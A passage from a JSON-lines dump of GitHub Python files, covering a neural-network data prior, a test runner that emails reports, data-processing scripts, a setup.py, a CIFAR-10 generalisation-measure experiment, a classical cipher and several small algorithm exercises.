x\n\n\nDEFAULT_NUM_LAYERS = 2\nDEFAULT_HIDDEN_DIM = 100\nDEFAULT_ACTIVATION_MODULE = torch.nn.ReLU\nDEFAULT_INIT_STD = .1\nDEFAULT_HIDDEN_NOISE_STD = .1\nDEFAULT_FIXED_DROPOUT = 0.\nDEFAULT_IS_BINARY_CLASSIFICATION = False\n\n\nclass GaussianNoise(nn.Module):\n def __init__(self, std):\n super().__init__()\n self.std = std\n\n def forward(self, x):\n return x + torch.normal(torch.zeros_like(x), self.std)\n\n\ndef causes_sampler_f(num_causes_sampler):\n num_causes = num_causes_sampler()\n means = np.random.normal(0, 1, (num_causes))\n std = np.abs(np.random.normal(0, 1, (num_causes)) * means)\n return means, std\n\ndef categorical_features_sampler(max_features):\n features = []\n ordinal = []\n num_categorical_features_sampler = scaled_beta_sampler_f(0.5, .8, max_features, 0)\n is_ordinal_sampler = lambda : random.choice([True, False])\n classes_per_feature_sampler = scaled_beta_sampler_f(0.1, 2.0, 10, 1)\n classes_per_feature_sampler_ordinal = scaled_beta_sampler_f(0.1, 2.0, 200, 1)\n for i in range(0, num_categorical_features_sampler()):\n ordinal_s = is_ordinal_sampler()\n ordinal.append(ordinal_s)\n classes = classes_per_feature_sampler_ordinal() if ordinal_s else classes_per_feature_sampler()\n features.append(np.random.rand(classes))\n return features, ordinal\n\n\ndef get_batch(batch_size, seq_len, num_features, device=default_device, hyperparameters=(DEFAULT_NUM_LAYERS, DEFAULT_HIDDEN_DIM, DEFAULT_ACTIVATION_MODULE, DEFAULT_INIT_STD, DEFAULT_HIDDEN_NOISE_STD, DEFAULT_FIXED_DROPOUT, DEFAULT_IS_BINARY_CLASSIFICATION),\n batch_size_per_gp_sample=None, num_outputs=1, canonical_args=None, sampling='normal'):\n assert num_outputs == 1\n num_layers_sampler, hidden_dim_sampler, activation_module, init_std_sampler, noise_std_sampler, dropout_prob_sampler, is_binary_classification, num_features_used_sampler, causes_sampler, is_causal, pre_sample_causes, pre_sample_weights, y_is_effect, order_y, normalize_by_used_features, categorical_features_sampler, nan_prob = hyperparameters\n\n # if is_binary_classification:\n # sample_batch_size = 100*batch_size\n # else:\n sample_batch_size = batch_size\n\n # if canonical_args is not None:\n # assert len(canonical_args) == num_causes\n # # should be list of [None, 2, 4] meaning scalar parameter, 2 classes, 4 classes\n #\n # for feature_idx, num_classes in enumerate(canonical_args):\n # if num_classes is not None:\n # causes[:,:,feature_idx] = torch.randint(num_classes, (seq_len, sample_batch_size))\n #\n # causes = canonical_pre_processing(causes, canonical_args)\n\n batch_size_per_gp_sample = batch_size_per_gp_sample or sample_batch_size // 8\n assert sample_batch_size % batch_size_per_gp_sample == 0, 'Please choose a batch_size divisible by batch_size_per_gp_sample.'\n num_models = sample_batch_size // batch_size_per_gp_sample\n # standard kaiming uniform init currently...\n\n def get_model():\n class MLP(torch.nn.Module):\n def __init__(self):\n super(MLP, self).__init__()\n\n self.dropout_prob = dropout_prob_sampler()\n self.noise_std = noise_std_sampler()\n self.init_std = init_std_sampler()\n self.num_features_used = num_features_used_sampler()\n self.categorical_features, self.categorical_features_is_ordinal = categorical_features_sampler(self.num_features_used)\n if is_causal:\n self.causes = causes_sampler() if is_causal else self.num_features_used\n self.causes = (torch.tensor(self.causes[0], device=device).unsqueeze(0).unsqueeze(0).tile((seq_len,1,1)), torch.tensor(self.causes[1], device=device).unsqueeze(0).unsqueeze(0).tile((seq_len,1,1)))\n self.num_causes = self.causes[0].shape[2]\n else:\n self.num_causes = self.num_features_used\n self.num_layers = num_layers_sampler()\n self.hidden_dim = hidden_dim_sampler()\n\n if is_causal:\n self.hidden_dim = max(self.hidden_dim, 2 * self.num_features_used+1)\n\n #print('cat', self.categorical_features, self.categorical_features_is_ordinal, self.num_features_used)\n\n assert(self.num_layers > 2)\n\n self.layers = [nn.Linear(self.num_causes, self.hidden_dim, device=device)]\n self.layers += [module for layer_idx in range(self.num_layers-1) for module in [\n nn.Sequential(*[\n activation_module()\n , nn.Linear(self.hidden_dim, num_outputs if layer_idx == self.num_layers - 2 else self.hidden_dim, device=device)\n , GaussianNoise(torch.abs(torch.normal(torch.zeros((num_outputs if layer_idx == self.num_layers - 2 else self.hidden_dim),device=device), self.noise_std))) if pre_sample_weights else GaussianNoise(self.noise_std)\n ])\n ]]\n self.layers = nn.Sequential(*self.layers)\n\n self.binarizer = Binarize() if is_binary_classification else lambda x : x\n\n # Initialize Model parameters\n for i, p in enumerate(self.layers.parameters()):\n dropout_prob = self.dropout_prob if i > 0 else 0.0\n nn.init.normal_(p, std=self.init_std / (1. - dropout_prob))\n with torch.no_grad():\n p *= torch.bernoulli(torch.zeros_like(p) + 1. - dropout_prob)\n\n def forward(self):\n if sampling == 'normal':\n if is_causal and pre_sample_causes:\n causes = torch.normal(self.causes[0], self.causes[1].abs()).float()\n else:\n causes = torch.normal(0., 1., (seq_len, 1, self.num_causes), device=device).float()\n elif sampling == 'uniform':\n causes = torch.rand((seq_len, 1, self.num_causes), device=device)\n else:\n raise ValueError(f'Sampling is set to invalid setting: {sampling}.')\n\n outputs = [causes]\n for layer in self.layers:\n outputs.append(layer(outputs[-1]))\n outputs = outputs[2:]\n\n if is_causal:\n outputs_flat = torch.cat(outputs, -1)\n random_perm = torch.randperm(outputs_flat.shape[-1]-1, device=device)\n random_idx_y = [-1] if y_is_effect else random_perm[0:num_outputs]\n y = outputs_flat[:, :, random_idx_y]\n\n random_idx = random_perm[num_outputs:num_outputs + self.num_features_used]\n x = outputs_flat[:, :, random_idx]\n else:\n y = outputs[-1][:, :, :]\n x = causes\n\n if len(self.categorical_features) > 0:\n random_perm = torch.randperm(x.shape[-1], device=device)\n for i, (categorical_feature, is_ordinal) in enumerate(zip(self.categorical_features, self.categorical_features_is_ordinal)):\n idx = random_perm[i]\n temp = normalize_data(x[:, :, idx])\n if is_ordinal:\n x[:, :, idx] = (temp > (torch.tensor(categorical_feature, device=device, dtype=torch.float32).unsqueeze(-1).unsqueeze(-1) - 0.5)).sum(axis=0)\n else:\n x[:, :, idx] = (temp > (torch.tensor(categorical_feature, device=device,\n dtype=torch.float32).unsqueeze(-1).unsqueeze(-1) - 0.5)).sum(\n axis=0) * (127 * len(categorical_feature) + 1) % len(categorical_feature)\n\n\n # if nan_prob > 0:\n # nan_value = random.choice([-999,-1,0, -10])\n # x[torch.rand(x.shape, device=device) > (1-nan_prob)] = nan_value\n\n x, y = normalize_data(x), normalize_data(y)\n\n # Binarize output if enabled\n y = self.binarizer(y)\n\n if normalize_by_used_features:\n x = normalize_by_used_features_f(x, self.num_features_used, num_features)\n\n if is_binary_classification and order_y:\n x, y = order_by_y(x,y)\n\n # Append empty features if enabled\n x = torch.cat([x, torch.zeros((x.shape[0], x.shape[1], num_features - self.num_features_used), device=device)], -1)\n\n return x, y\n\n return MLP()\n\n models = [get_model() for _ in range(num_models)]\n\n sample = sum([[model() for _ in range(0,batch_size_per_gp_sample)] for model in models],[])\n\n x, y = zip(*sample)\n y = torch.cat(y, 1).squeeze(-1).detach()\n x = torch.cat(x, 1).detach()\n\n return x, y, y\n\n\nDataLoader = get_batch_to_dataloader(get_batch)\nDataLoader.num_outputs = 1\n\n","repo_name":"automl/TransformersCanDoBayesianInference","sub_path":"priors/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":9866,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"72"} +{"seq_id":"26368546674","text":"import smtplib #邮箱服务\nfrom email.mime.text import MIMEText #邮箱模板\nimport unittest\nfrom Utils.HTMLTestRunner import HTMLTestRunner\nimport time,os\nfrom email.mime.multipart import MIMEMultipart #邮箱附件\nfrom email.header import Header #邮箱头部模板\nimport configparser\nfrom Utils.page import *\n#发送待邮件的函数\ndef send_mail(file_new):\n f = open(file_new,'rb')\n mail_body = f.read()\n f.close()\n #基本信息\n smtpserver = Helper().readConfig()[0]\n pwd = Helper().readConfig()[1]\n # 定义邮箱主题\n msg = MIMEMultipart()\n msg['subject']=Header(Helper().readConfig()[-1],'utf-8')\n msg['from'] = Helper().readConfig()[3]\n msg['to'] =Helper().readConfig()[4]\n body = MIMEText(mail_body,\"base64\",\"utf-8\")\n msg.attach(body)\n att = MIMEText(mail_body,'base64','utf-8')\n att['Content-Type'] =\"application/octet-stream\"\n att['Content-Disposition'] ='attachment;filename=\"Interface_report.html\"'\n msg.attach(att)\n #链接邮箱服务发送邮件\n smtp = smtplib.SMTP()\n smtp.connect(smtpserver)\n smtp.login(msg['from'],pwd)\n smtp.sendmail(msg['from'],msg['to'],msg.as_string())\n print(\"邮件发送成功\")\n #查找最新的邮箱\ndef new_file(test_dir):\n result_dir = test_dir\n # 列出测试报告目录下的所有文件\n lists = os.listdir(result_dir)\n lists.sort() #排序\n file = [x for x in lists if x.endswith('.html')]\n file_path = os.path.join(result_dir,file[-1])\n return file_path\n\nif __name__ == '__main__':\n base_dir = os.path.dirname(os.path.realpath(__file__))\n test_dir = os.path.join(base_dir,'testCases')\n test_report = os.path.join(base_dir,'Reports')\n testlist = unittest.defaultTestLoader.discover(test_dir,pattern='test*.py')\n now = time.strftime(\"%Y-%m-%d %H_%M_%S\")\n filename = test_report+'\\\\'+now +'result.html'\n fp = open(filename,'wb')\n runner = HTMLTestRunner(\n stream=fp,\n title=u'接口自动化框架测试报告',\n description=u'系统环境:win10'\n )\n runner.run(testlist)\n fp.close()\n new_report = new_file(test_report)\n send_mail(new_report)","repo_name":"tobyyu/interface_master","sub_path":"TestAPI/runAll.py","file_name":"runAll.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"752311514","text":"import pandas as pd\n\n\ndef process_ranking(file_name):\n # file_name = 'raw_data/stu_base.csv'\n\n file = pd.read_csv(file_name, encoding='gbk')\n\n file.columns = [x[1:-1] for x in file.columns]\n\n ranking = pd.DataFrame()\n ranking[\"uid\"] = file[\"i\"]\n ranking[\"ranking_absolu\"] = 1 / (file[\"ranking\"] / file[\"pro_stu_num\"])\n ranking[\"ranking\"] = file[\"ranking\"]\n\n ranking.to_csv(\"processed_data/ranking.csv\")","repo_name":"RongYangRosie/Evaluation-Algorithm-of-Bachelors-Learning-Ability","sub_path":"Deep Learning Models/scripts/process_ranking.py","file_name":"process_ranking.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43856336210","text":"import glob\nimport os\nimport numpy as np\nimport shutil\nfrom tqdm import tqdm \nfrom PIL import Image\nimport tool\nimport os.path\nfrom sys import argv\n\nloop_id = argv[1]\ncomp_id = argv[2]\nfor comp in range(3):\n if comp ==0:\n comp_id='3a'\n data_from_dir = './3adata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/'\n if comp ==1:\n comp_id='3b'\n data_from_dir = './3bdata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/'\n if comp ==2:\n comp_id='3c'\n data_from_dir = './3cdata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/'\n input_namelist = glob.glob(data_from_dir+ 'input/*.png')\n count =0 \n for path in tqdm(input_namelist):\n label_name = (path[:-4] + '.png').replace('input', 'label')\n if os.path.isfile(label_name) == False:\n count +=1\n os.remove(path) \nfor comp in range(3):\n if comp ==0:\n comp_id='3a'+str(int(loop_id))+'r'\n data_from_dir = './3adata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/'\n if comp ==1:\n comp_id='3b'+str(int(loop_id))+'r'\n data_from_dir = './3bdata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/'\n if comp ==2:\n comp_id='3c'+str(int(loop_id))+'r'\n data_from_dir = './3cdata'+str(int(loop_id))+'/data'+str(int(loop_id))+'/train/' \n \n input_namelist = glob.glob(data_from_dir+ 'input/*.png')\n label_namelist=[]\n for path in input_namelist:\n label_name = (path[:-4] + '.png').replace('input', 'label')\n label_namelist.append(label_name)\n \n scene_num = int(len(input_namelist)/12)\n \n \n yaw_times = 6\n rot_step_size = 360 / yaw_times\n y_ws = np.array([rot_step_size * i for i in range(yaw_times)]).tolist()\n ap_ws = [0, 1, 2, 3]\n p_ws = [0,10,20]\n r_ws = [0,-10,10]\n fl_ws = [0,1,2,3]\n \n image_save_dir = './tmp_data/input/'\n label_save_dir = './tmp_data/label/'\n tool.create_dir_not_exist(image_save_dir)\n tool.create_dir_not_exist(label_save_dir)\n \n for i in tqdm(range(scene_num)):\n tmp_new_label = np.ones(240*240*144,dtype=int).reshape(240,240,144)*255\n tmp_need_move_filename = '' \n for yt in y_ws: \n index = 0\n for pt in p_ws:\n for rt in r_ws:\n for ap_ind in ap_ws:\n for fl_ind in fl_ws:\n search_labelname = data_from_dir+'label/'+str(comp_id)+'num_'+str(int(i))+'_yaw_'+str(int(yt)) \\\n +'_ap_'+str(int(ap_ind))+'_pitch_'+str(int(pt)) \\\n +'_roll_'+str(int(rt))+'_fl_'+str(int(fl_ind))+'.png'\n if os.path.exists(search_labelname) == True:\n tmp_new_label[:,:,index] = np.asarray(Image.open(search_labelname))\n np.save(label_save_dir+comp_id+'_'+str(int(i))+'_yaw_'+str(int(yt))+'.npy',tmp_new_label.astype(np.uint8))\n # print(np.sum(tmp_new_label))\n search_imagename = data_from_dir+'input/'+str(comp_id)+'num_'+str(int(i))+'_yaw_'+str(int(yt)) \\\n +'_ap_'+str(int(ap_ind))+'_pitch_'+str(int(pt)) \\\n +'_roll_'+str(int(rt))+'_fl_'+str(int(fl_ind))+'.png'\n \n if os.path.exists(search_imagename) == True:\n tmp_need_move_filename = search_imagename\n shutil.copy(tmp_need_move_filename, image_save_dir+comp_id+'_'+str(int(i))+'_yaw_'+str(int(yt))+'.png')\n \n index+=1\n \n \n \n \n \n \n\n\n ","repo_name":"HKUST-RML/Learning-to-Grasp-by-Digging","sub_path":"arrange_data.py","file_name":"arrange_data.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"73286429353","text":"#!/usr/bin/env ruby\nimport zlib\nimport sys\n\ndata_file = sys.argv[1]\n\ndata = open(data_file, \"r\").read()\ndeco = zlib.compress(data.encode(\"utf8\"))\n\nwrfd = open(data_file + \".compressed\", \"wb\")\nwrfd.write(deco)\nwrfd.close()\nprint(\"Data {} compressed to {}\".format(data_file, data_file + \".compressed\"))\n","repo_name":"NextGenerationHackers/HTML5-Tools","sub_path":"e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72393034152","text":"input = __import__('sys').stdin.readline\nimport heapq\n\ndef to_int(time):\n time = time.replace('.', '')\n time = time.split(':')\n val = int(time[0]) * 3600 * 1000 + int(time[1]) * 60 *1000 + int(time[2])\n return val\n\nn = int(input())\nheap = []\nfor _ in range(n):\n st, ed = input().split()\n st, ed = to_int(st), to_int(ed)\n heap.append((st, 1))\n heap.append((ed, 0))\n\nheapq.heapify(heap)\nans = 0\ncur = 0\nwhile heap:\n ti, fl = heapq.heappop(heap)\n if fl == 0:\n cur -= 1\n else:\n cur += 1\n ans = max(ans, cur)\nprint(ans)","repo_name":"112224/algorithm","sub_path":"python3/22867 종점.py","file_name":"22867 종점.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19448839098","text":"# License AGPLv3 (http://www.gnu.org/licenses/agpl-3.0-standalone.html)\nimport os\nimport setuptools\n\n\nhere = os.path.dirname(os.path.abspath(__file__))\nwith open(os.path.join(here, 'README.md')) as f:\n long_description = f.read()\n\n\nsetuptools.setup(\n name='oca-maintainers-tools',\n author='Odoo Community Association (OCA)',\n description='Set of tools to help managing Odoo Community projects',\n long_description=long_description,\n license='APGL3',\n packages=['tools'],\n include_package_data=True,\n use_scm_version=True,\n setup_requires=[\n 'setuptools_scm',\n ],\n install_requires=[\n 'appdirs',\n 'argparse',\n 'autopep8',\n 'click',\n 'configparser', # for python2 compat\n # We need to pin docutils version, see\n # https://github.com/OCA/maintainer-tools/issues/423\n # Consider carefully before changing this.\n 'docutils>=0.15.1,<0.15.1.1',\n 'ERPpeek',\n 'github3.py>=1',\n 'inflection',\n 'jinja2',\n 'PyYAML',\n 'polib',\n 'pygments',\n 'requests',\n 'toml>=0.10.0', # for oca-towncrier\n 'towncrier>=19.2', # for oca-towncrier\n 'twine',\n 'wheel',\n ],\n python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'License :: OSI Approved :: '\n 'GNU Affero General Public License v3 or later (AGPLv3+)',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n ],\n entry_points={\n 'console_scripts': [\n 'oca-github-login = tools.github_login:main',\n 'oca-copy-maintainers = tools.copy_maintainers:main',\n 'oca-clone-everything = tools.clone_everything:main',\n 'oca-set-repo-labels = tools.set_repo_labels:main',\n 'oca-odoo-login = tools.odoo_login:main',\n 'oca-sync-users = tools.oca_sync_users:main',\n 'oca-autopep8 = tools.autopep8_extended:main',\n 'oca-gen-addons-table = tools.gen_addons_table:gen_addons_table',\n 'oca-migrate-branch = tools.migrate_branch:main',\n 'oca-migrate-branch-empty = tools.migrate_branch_empty:main',\n 'oca-pypi-upload = tools.pypi_upload:cli',\n 'oca-gen-addon-readme = tools.gen_addon_readme:gen_addon_readme',\n 'oca-gen-addon-icon = tools.gen_addon_icon:gen_addon_icon',\n 'oca-towncrier = tools.oca_towncrier:oca_towncrier',\n ],\n },\n)\n","repo_name":"julio-cesar-lazcano/oca","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13590137367","text":"#### Load Data ####\nimport numpy as np\nimport keras\nfrom keras.datasets import cifar10\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom numpy import linalg as LA\n\nimport tensorflow as tf\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" \nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.85\nsession = tf.Session(config=config)\n \ndef normalize(X_train,X_test):\n #this function normalize inputs for zero mean and unit variance\n # it is used when training a model.\n # Input: training set and test set\n # Output: normalized training set and test set according to the trianing set statistics.\n mean = np.mean(X_train,axis=(0,1,2,3))\n std = np.std(X_train, axis=(0, 1, 2, 3))\n X_train = (X_train-mean)/(std+1e-7)\n X_test = (X_test-mean)/(std+1e-7)\n return X_train, X_test\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_train, x_test = normalize(x_train, x_test)\n\ny_train = keras.utils.to_categorical(y_train, 10)\ny_test = keras.utils.to_categorical(y_test, 10)\n\ndatagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=15, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n# (std, mean, and principal components if ZCA whitening is applied).\ndatagen.fit(x_train)\n\nfrom keras import optimizers\nfrom keras import backend as K\nimport copy\n\ndef co_measure(fname,drop_rate):\n K.clear_session()\n model = keras.models.load_model(fname+'/final_139.h5',compile=False)\n sgd = optimizers.SGD_test(add_ah=False, add_noise=0.0, a_corr=np.zeros([12,512,512]), h_corr=np.zeros([12,512,512]), lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(loss='categorical_crossentropy', optimizer=sgd,metrics=['accuracy'])\n orig_weights = model.get_weights()\n ori_loss, ori_acc = model.evaluate(x_train, y_train,verbose=0)\n tst_loss, tst_acc = model.evaluate(x_test, y_test,verbose=0)\n \n ##############################################f_norm,p_norm#########################################################\n model_initial = keras.models.load_model(fname+'/initial.h5',compile=False)\n sgd = optimizers.SGD_test(add_ah=False, add_noise=0.0, a_corr=np.zeros([12,512,512]), h_corr=np.zeros([12,512,512]), lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\n model_initial.compile(loss='categorical_crossentropy', optimizer=sgd,metrics=['accuracy'])\n initial_weights = model_initial.get_weights()\n \n sum_f_norm = 0\n sum_p_norm = 0\n pro_f_norm = 1\n pro_p_norm = 1\n for jj in range(len(orig_weights)):\n if len(orig_weights[jj].shape)>1:\n sum_f_norm += LA.norm(orig_weights[jj]-initial_weights[jj])\n sum_p_norm += LA.norm(orig_weights[jj])\n pro_f_norm *= LA.norm(orig_weights[jj]-initial_weights[jj])\n pro_p_norm *= LA.norm(orig_weights[jj])\n \n ##############################################spectral_norm, nop###################################################\n nop = 0\n sum_s_norm = 0\n pro_s_norm = 1\n for i in range(len(orig_weights)):\n wf = orig_weights[i]-initial_weights[i]\n if len(wf.shape) == 2:\n if wf.shape[0] > wf.shape[1]:\n aa = wf.T.dot(wf)\n else:\n aa = wf.dot(wf.T) \n sum_s_norm += np.sqrt(np.max(np.sum(np.abs(aa),axis=1)))\n pro_s_norm *= np.sqrt(np.max(np.sum(np.abs(aa),axis=1)))\n nop += wf.shape[0] * wf.shape[1]\n \n elif len(wf.shape) == 4:\n aa = 0\n for w1 in wf:\n for w2 in w1:\n zz = w2.dot(w2.T)\n aa = aa + np.max(np.sum(np.abs(zz),axis=1))\n sum_s_norm += np.sqrt(aa)\n pro_s_norm *= np.sqrt(aa)\n nop += wf.shape[0] * wf.shape[1] * wf.shape[2] * wf.shape[3]\n \n \n \n ##############################################laplace############################################################\n def get_weight_grad(model, inputs, outputs):\n \"\"\" Gets gradient of model for given inputs and outputs for all weights\"\"\"\n grads = model.optimizer.get_gradients(model.total_loss, model.trainable_weights)\n symb_inputs = (model._feed_inputs + model._feed_targets + model._feed_sample_weights)\n f = K.function(symb_inputs, grads)\n x, y, sample_weight = model._standardize_user_data(inputs, outputs)\n output_grad = f(x + y + sample_weight)\n return output_grad\n\n def get_layer_output_grad(model, inputs, outputs, layer=-1):\n \"\"\" Gets gradient a layer output for given inputs and outputs\"\"\"\n grads = model.optimizer.get_gradients(model.total_loss, model.layers[layer].output)\n symb_inputs = (model._feed_inputs + model._feed_targets + model._feed_sample_weights)\n f = K.function(symb_inputs, grads)\n x, y, sample_weight = model._standardize_user_data(inputs, outputs)\n output_grad = f(x + y + sample_weight)\n return output_grad\n\n def tran_a(a_1):\n a_1 = np.mean(a_1, axis=0)\n a_1 = a_1.reshape(a_1.shape[0]*a_1.shape[1],-1)\n a_1 = np.mean(a_1,axis=0)\n return a_1\n\n def tran_h(h_2):\n h_2 = np.mean(h_2, axis=0)\n h_2 = h_2.reshape(h_2.shape[0]*h_2.shape[1],-1)\n h_2 = np.mean(h_2,axis=0)+10**-13\n return h_2\n\n def load(a):\n a_1 = []\n h_2 = []\n num = 0\n layer_1 = K.function([model.layers[0].input], [model.layers[a].output])\n for num in [0,20,40,60,80,100,120]:\n a_1.append(tran_a(layer_1([x_train[num:num+20]])[0]))\n\n for num in [0,20,40,60,80,100,120]:\n h_2.append(tran_h(get_layer_output_grad(model, x_train[num:num+20], y_train[num:num+20], a+1)[0]))\n return a_1, h_2\n \n a_1, h_2 = load(-13)\n split = 16\n deet_a = []\n for i in range(int(len(a_1[0])/split)):\n a = np.zeros((split,split))\n for e in range(50):\n noise = (np.random.uniform(0,1,split)>drop_rate).astype(float)\n a += np.kron(a_1[0][i*split:i*split+split]*noise, np.array([a_1[0][i*split:i*split+split]*noise]).reshape(-1,1))\n for j in range(1,len(a_1)):\n a += np.kron(a_1[j][i*split:i*split+split]*noise, np.array([a_1[j][i*split:i*split+split]*noise]).reshape(-1,1)) \n a = np.abs(np.linalg.inv(a/50))\n a = a/np.max(a)\n for j in range(len(a)):\n a[j][j] = 1\n deet_a.append(np.linalg.det(a))\n deet_a = np.mean(deet_a)\n\n\n deet_h = []\n for e in range(20):\n for i in range(int(len(a_1[0])/split)):\n a = np.kron(h_2[0][i*split:i*split+split], np.array([h_2[0][i*split:i*split+split]]).reshape(-1,1)) \n for j in range(1,len(h_2)):\n a += np.kron(h_2[j][i*split:i*split+split], np.array([h_2[j][i*split:i*split+split]]).reshape(-1,1))\n a = a/np.max(a)\n a += np.random.normal(loc=0.0, scale=0.00001, size=(len(a),len(a)))\n a = np.abs(np.linalg.inv(a))\n a = a/np.max(a)\n for j in range(len(a)):\n a[j][j] = 1\n deet_h.append(np.linalg.det(a))\n deet_h = np.mean(deet_h) \n\n ##############################################sharpness############################################################\n def add_noise(weights, sigma):\n for i in range(len(weights)):\n n = np.random.normal(0, sigma, weights[i].shape)\n weights[i] += weights[i]*n\n model.set_weights(weights)\n index = np.random.randint(0,50000,5000)\n loss, acc = model.evaluate(x_train[index], y_train[index],verbose=0)\n return acc\n\n lower = 0\n sigma = 0.1 \n acc = add_noise(copy.deepcopy(orig_weights), sigma)\n\n ssigma = []\n aacc = []\n ssigma.append(sigma)\n aacc.append(acc)\n for i in range(10):\n if ori_acc-acc>0.05:\n sigma = sigma-(sigma-lower)/2\n acc1 = []\n for j in range(5):\n acc1.append(add_noise(copy.deepcopy(orig_weights), sigma))\n acc = min(acc1)\n else:\n a = (sigma - lower)/2\n lower = copy.deepcopy(sigma)\n sigma = sigma*1.1\n acc1 = []\n for j in range(5):\n acc1.append(add_noise(copy.deepcopy(orig_weights), sigma))\n acc = min(acc1)\n ssigma.append(sigma)\n aacc.append(acc)\n\n aacc = np.array(aacc)\n aacc = aacc - ori_acc + 0.05\n minacc = 1\n mindex = 0\n for i in range(len(aacc)):\n if aacc[i]>0 and aacc[i]\r\n if mode == 'encrypt':\r\n num += LETTERS.find(key[keyIndex])\r\n\r\n elif mode == 'decrypt':\r\n num -= LETTERS.find(key[keyIndex])\r\n\r\n num %= len(LETTERS) # Обработка завёртывания\r\n\r\n # Добаляем букву в тот регистр, который был у неё в изначальном сообщении\r\n if symbol.isupper():\r\n translate.append(LETTERS[num])\r\n elif symbol.islower():\r\n translate.append(LETTERS[num].lower())\r\n\r\n keyIndex += 1 # Переходим к следующему символу ключа\r\n if keyIndex == len(key):\r\n keyIndex = 0\r\n else:\r\n # Если символ не найден в LETTERS -> оставляем его без изменений\r\n translate.append(symbol)\r\n return ''.join(translate)\r\n\r\n\r\ndef main():\r\n # myMessage = input('Введите сообщение: ')\r\n myMessage = \"Секретное сообщение, которое невозможно будет взломать.\"\r\n # myMessage = \"Юцъамчеис ммбицрцфл, жхйесцп жгзюяшгфжш авмъл бырхлэнк.\"\r\n\r\n myMode = input(\"Введите:\\nencrypt - для шифровки сообщения\\ndecrypt - для расшифровки сообщения:\\n\")\r\n\r\n if myMode == 'encrypt':\r\n myKey = getKey(myMessage.replace(' ', ''))\r\n translated = translateMessage(myKey, myMessage, 'encrypt')\r\n elif myMode == 'decrypt':\r\n myKey = input('Введите ключ: ')\r\n translated = translateMessage(myKey, myMessage, 'decrypt')\r\n else:\r\n print('Неверно введено encrypt или decrypt')\r\n sys.exit()\r\n\r\n if myMode == 'encrypt':\r\n print(f'\\nКлюч:\\n{myKey}\\nСообщение:\\n{translated}')\r\n elif myMode == 'decrypt':\r\n print(f'\\nСообщение:\\n{translated}')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"MrTOOGLE/Disposable-cipher-pad","sub_path":"Проект_Одноразовый шифроблокнот.py","file_name":"Проект_Одноразовый шифроблокнот.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3434142080","text":"class Solution:\n romans = [\n (1, 'I'),\n (5, 'V'),\n (10, 'X'),\n (50, 'L'),\n (100, 'C'),\n (500, 'D'),\n (1000, 'M')\n ][::-1]\n def intToRoman(self, num: int) -> str:\n result = ''\n for i,(nu_val, numeral) in enumerate(self.romans):\n if num >= nu_val:\n result += numeral * (num//nu_val)\n num %= nu_val\n if numeral != 'I':\n pre_nu_val, pre_numeral = self.romans[i + 1 + int(i%2==0)]\n if num >= nu_val - pre_nu_val:\n result += pre_numeral + numeral\n num %= pre_nu_val\n return result\n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_0012/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13176628060","text":"class Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n ans = []\n que = collections.deque()\n for i in range(k):\n while que and que[-1] < nums[i]:\n que.pop()\n que.append(nums[i])\n ans.append(que[0])\n\n for i in range(k,len(nums)):\n if nums[i-k] == que[0]:\n que.popleft()\n while que and que[-1] < nums[i]:\n que.pop()\n que.append(nums[i])\n ans.append(que[0])\n return ans\n","repo_name":"Demo0617/LeetCode","sub_path":"LC/hard/array/59.maxSlidingWindow.py","file_name":"59.maxSlidingWindow.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13856996310","text":"from flask import Blueprint,render_template\r\nfrom flask import *\r\nfrom datetime import datetime as 